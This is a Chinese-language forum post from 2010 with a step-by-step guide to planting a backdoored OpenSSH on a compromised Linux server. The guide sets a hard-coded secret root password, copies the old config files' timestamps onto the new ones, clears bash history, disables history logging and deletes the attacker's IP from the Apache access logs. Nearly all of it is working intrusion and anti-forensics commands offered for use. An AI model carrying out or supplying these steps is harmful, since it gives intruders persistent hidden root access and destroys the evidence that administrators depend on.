<a href="http://hack520.co.kr/?action=show&id=34">http://hack520.co.kr/?action=show&id=34</a>
豬神曰:此程序有後門。
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者
本帖最后由 pt007 于 2010-7-30 12:53 编辑
1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
shell-# tar zxvf sshbd.tgz
shell-# cd openssh
4、设置ssh后门的登录密码:
vi versio.h
#define SSH_VERSION "OpenSSH_4.2" --> you've to edit OpenSSH_4.2
vi includes.h
define _SECRET_PASSWD "test123" -> edit as u wish password
5、继续安装:
shell-# ./configure --prefix=/usr --sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
shell-# /etc/init.d/sshd restart
6、登入后门:
ssh -l root 192.168.1.188
密码:test123
echo >/root/.bash_history //清空操作日志
7、清除apache日志:
export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i '/210.73.64.100/d' access_log*
![unit 1 - redhat Enterprise 8.0 Linux 命令行使用技巧[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)